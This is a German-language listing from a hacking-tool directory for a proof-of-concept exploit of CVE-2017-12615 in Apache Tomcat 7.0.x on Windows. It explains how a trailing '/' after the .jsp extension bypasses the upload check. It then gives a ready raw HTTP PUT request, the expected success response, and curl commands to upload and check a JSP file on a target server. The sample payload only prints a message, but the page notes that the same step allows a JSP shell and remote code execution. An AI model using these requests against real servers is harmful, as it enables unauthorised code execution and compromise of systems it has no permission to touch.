Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2017-12615 — POC-Exploit für Apache Tomcat 7.0.x CVE-2017-12615 PUT JSP-Schwachstelle. | Kitploit
Tools/GitHubGitHub/breaktoprotect/cve-2017-12615
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubbreaktoprotect/cve-2017-12615

CVE-2017-12615

POC-Exploit für Apache Tomcat 7.0.x CVE-2017-12615 PUT JSP-Schwachstelle.

Repository anzeigen
112212vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

In Erinnerung an Chia Junyuan (https://packetstormsecurity.com/files/author/11924/)

POC CVE-2017-12615

POC Exploit für Apache Tomcat 7.0.0 bis 7.0.79 unter Windows; CVE-2017-12615 PUT JSP-Schwachstelle.

Beschreibung:

Standardmäßig ist es nicht erlaubt, JSP-Dateien über die PUT-Methode auf den Apache Tomcat-Servern hochzuladen. Dies ist wahrscheinlich eine Sicherheitsmaßnahme, um zu verhindern, dass ein Angreifer eine JSP-Shell hochlädt und eine entfernte Codeausführung auf dem Server erlangt. Aufgrund unzureichender Prüfungen könnte ein Angreifer jedoch eine entfernte Codeausführung auf Tomcat-Servern der Versionen 7.0.{0 bis 79} erreichen, die PUT aktiviert haben, indem er eine speziell gestaltete HTTP-Anfrage mit der PUT-Methode an den Tomcat-Server sendet. Aber ernsthaft, speziell? Bitte.

Exploit-Methode:

Durch Anhängen eines '/' Zeichens hinter der Dateinamenerweiterung kann die Überprüfung der Dateierweiterung umgangen werden. Das war's. Also eigentlich nicht so speziell.

Exploit in einer Anfrage-Methode:

Anfrage

PUT /myfile.jsp/
Host: domain-name:port
Connection: close
Content-Length: 85

<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>

Erwartete Antwort bei Erfolg

HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Sat, 23 Sep 2017 06:36:36 GMT
Connection: close

Exploit mit 'curl':

  1. Erstellen Sie eine .jsp-Datei (z.B. test.jsp):
<% out.write("<html><body><h3>[+] JSP file successfully uploaded via curl and JSP out.write  executed.</h3></body></html>"); %>
  1. Führen Sie den curl-Befehl auf dem Zielserver aus:
curl -X PUT http://target-host-or-ip-address:port/test.jsp/ -d @- < test.jsp
  1. Überprüfen Sie, ob Ihre Datei hochgeladen wurde, indem Sie die Zieladresse aufrufen oder:
curl http://target-host-or-ip-address:port/test.jsp
Tool herunterladen